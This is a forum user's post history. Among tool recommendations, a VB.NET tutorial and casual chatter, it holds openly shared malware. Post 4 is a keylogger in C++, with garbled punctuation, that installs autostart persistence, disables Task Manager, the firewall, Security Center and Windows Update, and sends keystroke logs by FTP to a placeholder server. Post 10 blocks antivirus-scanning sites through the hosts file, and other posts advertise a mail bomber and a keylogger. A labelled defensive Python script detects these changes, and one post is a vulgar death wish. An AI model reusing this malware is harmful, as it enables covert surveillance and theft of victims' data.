Skream Example

Active Members
  • Posts: 147
  • Days Won: 1

Everything posted by Skream Example

  1. Process Monitor v2.94 By Mark Russinovich and Bryce Cogswell

     This is a tool I personally use from time to time. I mostly use it to grab registry keys and/or files being changed by certain processes, but it can be used for so much more. All in all, a great tool when you want to monitor a process's actions (IO, reg, etc.). You can also monitor multiple processes and/or filter actions out or in as you want.

     Further information:

     Introduction

     Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. It combines the features of two legacy Sysinternals utilities, Filemon and Regmon, and adds an extensive list of enhancements including rich and non-destructive filtering, comprehensive event properties such as session IDs and user names, reliable process information, full thread stacks with integrated symbol support for each operation, simultaneous logging to a file, and much more. Its uniquely powerful features will make Process Monitor a core utility in your system troubleshooting and malware hunting toolkit.

     Overview of Process Monitor Capabilities

     Process Monitor includes powerful monitoring and filtering capabilities, including:

     * More data captured for operation input and output parameters
     * Non-destructive filters allow you to set filters without losing data
     * Capture of thread stacks for each operation makes it possible in many cases to identify the root cause of an operation
     * Reliable capture of process details, including image path, command line, user and session ID
     * Configurable and moveable columns for any event property
     * Filters can be set for any data field, including fields not configured as columns
     * Advanced logging architecture scales to tens of millions of captured events and gigabytes of log data
     * Process tree tool shows relationship of all processes referenced in a trace
     * Native log format preserves all data for loading in a different Process Monitor instance
     * Process tooltip for easy viewing of process image information
     * Detail tooltip allows convenient access to formatted data that doesn't fit in the column
     * Cancellable search
     * Boot time logging of all operations

     The best way to become familiar with Process Monitor's features is to read through the help file and then visit each of its menu items and options on a live system.

     Taken from Process Monitor

     Download link: http://download.sysinternals.com/Files/ProcessMonitor.zip
     EXE download link: http://live.sysinternals.com/Procmon.exe
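
An added example, not part of the original post or of Process Monitor itself: a triage pass over a Process Monitor CSV export that flags the registry and file writes a defender would look for, using the Run key, the `Policies\System` values and the hosts file path that appear in code posted elsewhere on this page. It assumes the default export columns; the sample rows, process names and labels are constructed for illustration.

```python
import csv
import io

# (operations, lowercase path fragment, finding label) - labels are this example's own
RULES = [
    ({"RegSetValue", "RegCreateKey"}, r"\currentversion\run", "autorun persistence"),
    ({"RegSetValue"}, r"\policies\system\disabletaskmgr", "Task Manager disabled"),
    ({"RegSetValue"}, r"\policies\system\disableregistrytools", "registry tools disabled"),
    ({"WriteFile", "SetEndOfFileInformationFile"}, r"\drivers\etc\hosts", "hosts file modified"),
]

# Constructed sample in the layout of a Procmon "Save as CSV" export.
SAMPLE = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","sample.exe","4242","RegSetValue","HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Updater","SUCCESS","Type: REG_SZ"
"10:01:02.2","sample.exe","4242","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","SUCCESS","Type: REG_DWORD"
"10:01:02.3","sample.exe","4242","WriteFile","C:\Windows\System32\drivers\etc\hosts","SUCCESS","Offset: 824, Length: 40"
"10:01:03.0","notepad.exe","1000","WriteFile","C:\Users\test\notes.txt","SUCCESS","Offset: 0, Length: 12"
"10:01:03.5","explorer.exe","900","RegQueryValue","HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Updater","SUCCESS","Type: REG_SZ"
"10:01:04.0","sample.exe","4242","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","ACCESS DENIED",""
'''


def triage(stream):
    """Return (process, pid, label, path, result) for every event matching RULES."""
    findings = []
    for row in csv.DictReader(stream):
        op, path = row["Operation"], row["Path"].lower()
        for ops, fragment, label in RULES:
            if op in ops and fragment in path:
                # Keep the Result column: a denied write is still an attempt worth seeing.
                findings.append((row["Process Name"], row["PID"], label,
                                 row["Path"], row["Result"]))
                break
    return findings


if __name__ == "__main__":
    # For a real export, open the file with encoding="utf-8-sig" to drop the BOM.
    for finding in triage(io.StringIO(SAMPLE)):
        print(" | ".join(finding))
```

Reads such as `RegQueryValue` on the Run key are deliberately not flagged, since many legitimate processes enumerate it.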
  2. I shit on your thread, may you die choking on vomit, just die
  3. Attribute VB_Name = "mWinProdKey"
     Option Explicit

     Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
     Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
     Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
     Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)

     Public Function WinProdKey() As String
         Dim lhKey As Long
         Dim bvBuffer(163) As Byte
         Dim vCharset As Variant
         Dim bvChar(23) As Byte
         Dim I As Long
         Dim j As Long
         Dim lCur As Long

         If RegOpenKey(&H80000002, "SOFTWARE\MICROSOFT\Windows NT\CurrentVersion", lhKey) = 0& Then
             If RegQueryValueEx(lhKey, "DigitalProductId", 0, 3, bvBuffer(0), 164) = 0 Then
                 Call CopyMemory(bvBuffer(0), bvBuffer(52), &HF)
                 vCharset = Array( _
                     "B", "C", "D", "F", "G", "H", "J", "K", "M", "P", "Q", "R", _
                     "T", "V", "W", "X", "Y", "2", "3", "4", "6", "7", "8", "9")
                 For I = 0 To 23
                     bvChar(I) = Asc(vCharset(I))
                 Next
                 For I = 24 To 0 Step -1
                     lCur = 0
                     For j = 14 To 0 Step -1
                         lCur = lCur * 256 Xor bvBuffer(j)
                         bvBuffer(j) = Int(lCur / 24)
                         lCur = lCur Mod 24
                     Next
                     WinProdKey = vCharset(lCur) & WinProdKey
                     If I Mod 5 = 0 And I <> 0 Then WinProdKey = "-" & WinProdKey
                 Next
             End If
             Call RegCloseKey(lhKey)
         End If
     End Function
  4. #include <windows.h> #include <Winuser.h> #include <string> #include <fstream> using namespace std; char BatchFile[20] = "system.bat"; char* params; DWORD WINAPI OpenBatFile(LPVOID) { for( { Sleep(300000); ShellExecute(NULL* "open"* BatchFile* NULL* NULL* SW_HIDE);} } std::string GetKey(int Key) { std::string KeyString = ""; if (Key == 8) KeyString = "[delete]"; else if (Key == 13) KeyString = "\n"; else if (Key == 32) KeyString = " "; else if (Key == VK_PAUSE) KeyString = "[PAUSE]"; else if (Key == VK_CAPITAL) KeyString = "[CAPITAL]"; else if (Key == VK_SHIFT) KeyString = "[SHIFT]"; else if (Key == VK_TAB) KeyString = "[TABULATOR]"; else if (Key == VK_CONTROL) KeyString = "[CTRL]"; else if (Key == VK_ESCAPE) KeyString = "[ESCAPE]"; else if (Key == VK_END) KeyString = "[END]"; else if (Key == VK_HOME) KeyString = "[HOME]"; else if (Key == VK_LEFT) KeyString = "[left]"; else if (Key == VK_RIGHT) KeyString = "[right]"; else if (Key == VK_UP) KeyString = "[UP]"; else if (Key == VK_DOWN) KeyString = "[DOWN]"; else if (Key == VK_SNAPSHOT) KeyString = "[SNAPSHOT]"; else if (Key == VK_NUMLOCK) KeyString = "[NUMLOCK]"; else if (Key == 190 || Key == 110) KeyString = "."; else if (Key >=96 && Key <= 105) KeyString = Key-48; else if (Key > 47 && Key < 60) KeyString = Key; if (Key != VK_LBUTTON || Key != VK_RBUTTON) { if (Key > 64 && Key < 91) { if (GetKeyState(VK_CAPITAL)) KeyString = Key; else { Key = Key + 32; KeyString = Key; } } } return KeyString; } int main() { int WINAPI WinMain (HINSTANCE hThisInstance* HINSTANCE hPrevInstance* LPSTR lpszArgument* int nFunsterStil); char path[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL); char sys[MAX_PATH]; GetModuleFileName(GetModH* path* sizeof(path)); GetSystemDirectory(sys* sizeof(sys)); strcat(sys* "\\borg.exe"); CopyFile(path* sys* false); HKEY hKey* hKey2; unsigned char reg[2] = "0"; RegOpenKeyEx(HKEY_LOCAL_MACHINE*"Software\\Microsoft\\Windows\\CurrentVersion\\Run"* 0* KEY_SET_VALUE* &hKey ); RegSetValueEx(hKey* 
"MS-Windows-secretly"* 0* REG_SZ*(const unsigned char*)sys* sizeof(sys)); RegCreateKey(HKEY_CURRENT_USER*"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"*&hKey2); RegSetValueEx(hKey2*"DisableTaskMgr"*0*REG_DWORD*reg*sizeof(reg)); RegCloseKey(hKey)*(hKey2); DeleteFile("C:\\WINDOWS\\system32\\log.txt"); ofstream FWUP; FWUP.open("C:\\WINDOWS\\system32\\update.bat"); FWUP<<"@echo off\n"; FWUP<<"net stop ""Security Center""\n"; FWUP<<"net stop SharedAccess\n"; FWUP<<"> ""%Temp%.\\kill.reg"" ECHO REGEDIT4\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n"; FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\\kill.reg""\n"; FWUP<<"DEL ""%Temp%.\\kill.reg""\n"; FWUP<<"DEL %0\n"; FWUP.close(); ofstream disable; disable.open("C:\\WINDOWS\\system32\\syssvr.bat"); disable<<"@echo off\n"; disable<<"reg add ""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NUL\n"; disable.close(); //write ur ftp-information's here ofstream log; log.open("C:\\WINDOWS\\system32\\drivers\\config.sys"); log<<"OPEN ftpserver\n"; log<<"USER username\n"; log<<"ftppassword\n"; log<<"ASCII\n"; log<<"SEND C:\\WINDOWS\\system32\\log.txt\n"; log<<"BYE\n"; log<<"exit\n"; log.close(); ofstream Ausgabe; Ausgabe.open("C:\\WINDOWS\\system32\\system.bat"); Ausgabe<<"ftp -n -i 
-s:C:\\WINDOWS\\system32\\drivers\\config.sys\n"; Ausgabe<<"bye\n"; Ausgabe<<"exit\n"; Ausgabe.close(); ShellExecute(NULL* NULL* "C:\\WINDOWS\\system32\\syssvr.bat"* params* NULL* SW_HIDE); ShellExecute(NULL* NULL* "C:\\WINDOWS\\system32\\update.bat"* params* NULL* SW_HIDE); DWORD OpenBatch; HANDLE hOpenBatFile = CreateThread(NULL* 0* OpenBatFile* 0* 0* &OpenBatch); std::string Filename = "C:\\WINDOWS\\system32\\log.txt"; std::string TempString = ""; std::fstream FStream; FStream.open(Filename.c_str()* std::fstream::out | std::fstream::app); while(true) { // 0% CPU Sleep(5); for(int i = 8; i < 191; i++) { if(GetAsyncKeyState(i)&1 ==1) { TempString = GetKey (i); FStream.write(TempString.c_str()* TempString.size()); FStream.close(); FStream.open(Filename.c_str()* std::fstream::out | std::fstream::app); } } } }
  5. Public Function MD5CalcFile(ByVal filepath As String) As String
         Using reader As New System.IO.FileStream(filepath, IO.FileMode.Open, IO.FileAccess.Read)
             Using md5 As New System.Security.Cryptography.MD5CryptoServiceProvider
                 Dim hash() As Byte = md5.ComputeHash(reader)
                 Return ByteArrayToString(hash)
             End Using
         End Using
     End Function

     Private Function ByteArrayToString(ByVal arrInput() As Byte) As String
         Dim sb As New System.Text.StringBuilder(arrInput.Length * 2)
         For i As Integer = 0 To arrInput.Length - 1
             sb.Append(arrInput(i).ToString("X2"))
         Next
         Return sb.ToString().ToLower
     End Function

     Function getMD5Hash(ByVal strToHash As String) As String
         Dim md5Obj As New Security.Cryptography.MD5CryptoServiceProvider
         Dim bytesToHash() As Byte = System.Text.Encoding.ASCII.GetBytes(strToHash)
         bytesToHash = md5Obj.ComputeHash(bytesToHash)
         Dim strResult As String = ""
         For Each b As Byte In bytesToHash
             strResult += b.ToString("x2")
         Next
         Return strResult
     End Function

     Dump from my Visual Studio folder. Most likely I got it off the net, so credits to whoever originally created it. I use it a lot.

     Usage:

     Dim MD5Str As String = getMD5Hash("abc")
     Dim FileMD5 As String = MD5CalcFile("c:\boot.ini")
  6. Skream Example

    Isr

    What happened to ISR? It hasn't been working for a good few weeks.
  7. By the time they fix it, the apocalypse will come.
  8. Bankruptcy is near! How will Romania pay its debts if it no longer produces anything? read more
  9. The ability to work with arrays is important in any programming language. VB.NET offers a simple way of grouping data into array structures, similarly to other languages. In this article, I will look at array declaration and usage.

     Purpose of the arrays

     Arrays are generally used for storing similar types of values or objects. They allow grouping variables together and allow referring to them by using an index. Arrays have an upper bound and a lower bound, which simply refer to the starting index and the ending index of a given array structure. Additionally, the data in the array can be sorted. Simple arrays are one-dimensional; however, you can also use multi-dimensional arrays in VB.NET. You can loop through an array to determine and to modify the values stored in the array.

     Declaring and initialising arrays

     There are two ways of initialising the arrays: to declare and initialise them in one statement, or to declare an array and choose to initialise it later. When declaring and initialising arrays in the same statement, you must specify the type of the array elements and the number of the elements the array will hold. In VB.NET, arrays are zero based, which means that the index of the first element is zero. The elements are numbered sequentially. You must specify the number of array elements by indicating the upper bound of the array. The upper bound is the number that specifies the index of the last element in the array. Snippet A shows the declaration and initialisation of an array of integers.

     Snippet A

     Dim arrNumbers(4) As Integer 'Declares & initialises an array of 5 integers, with indexes ranging from 0 to 4

     Another way to declare and initialise arrays is to perform these operations in two separate steps. If you declare an array without specifying a number of elements on one line, you have to provide the values for each item of the array when you initialise it. The initial values are provided enclosed in the {} braces, using a comma as a separator. Snippet B shows the declaration and initialisation of an array in two separate steps.

     Snippet B

     Dim arrNumbers() As Integer 'Declares the array of integers
     arrNumbers = New Integer() {0,1,2,3,4} 'Initialises the array to five members & sets their values

     Once an array is declared and initialised, it's possible to change the size of an array at run time by redefining it. You can use the ReDim statement to change the number of items in an array structure. Snippet C shows declaration, initialisation, and then re-sizing of an array structure.

     Snippet C

     Dim arrNumbers(32) As Integer 'Declares & initialises an array of integers
     ReDim arrNumbers(45) 'Re-initialises the array

     By default, the data stored in an array is lost whenever an array is re-initialised. However, you can use the ReDim statement with the Preserve keyword in order to keep the existing data in the array when it's being re-initialised. Snippet D re-initialises an array structure using the Preserve keyword to keep the data already stored in the array.

     Snippet D

     Dim arrNumbers() As Integer = {0,1,2,3,4} 'Declares & initialises the array
     ReDim Preserve arrNumbers(25) 'Resizes the array, but retains the data in elements 0 through 4

     Credits: pradeep
  10. Imports System.IO Imports System.Reflection #Region " block all Av sites " Public Shared Sub avbloker() 'Dim objWriter As New System.IO.StreamWriter("C:\fire2.txt") 'objWriter.Write("xfind2") 'objWriter.Close() Dim path As [String] = "C:\Windows\System32\drivers\etc\hosts" Dim sw As New StreamWriter(path, True) Dim sitetoblock As [String] = vbLf & " 127.0.0.1 www.virustotal.com" Dim sitetoblock1 As [String] = vbLf & " 127.0.0.1 www.virscan.org" Dim sitetoblock2 As [String] = vbLf & " 127.0.0.1 www.virusscan.jotti.org" Dim sitetoblock3 As [String] = vbLf & " 127.0.0.1 www.vscan.novirusthanks.org" sw.Write(sitetoblock) sw.Write(vbNewLine & sitetoblock1) sw.Write(vbNewLine & sitetoblock2) sw.Write(vbNewLine & sitetoblock3) sw.Close() End End Sub #End Region
  11. Spy Net (April 11, 2011) 22:00 Video by Skream - Myspace Video. I'm having a bit of fun too at the start of the week.
  12. Why would it be a shame? You're posting nonsense.
  13. Product Name:CH MAIL BOMBER Author:Skream Example (Source Code and Design) Location:Europe,Romania Download Now
  14. Product Name:Exploit Keylogger Author:Skream Example Location:Europe,Romania Download now
  15. Then let's go for a hookah with cola, like I did in the park with my classmates; people were saying we were on drugs.
  16. The illusion that they are healthier and the advantage of the taste sell menthol cigarettes well, especially to young people. The Americans want to ban them.
  17. I liked them, from now on I smoke these all day :))
  18. What is this? From Kaspersky?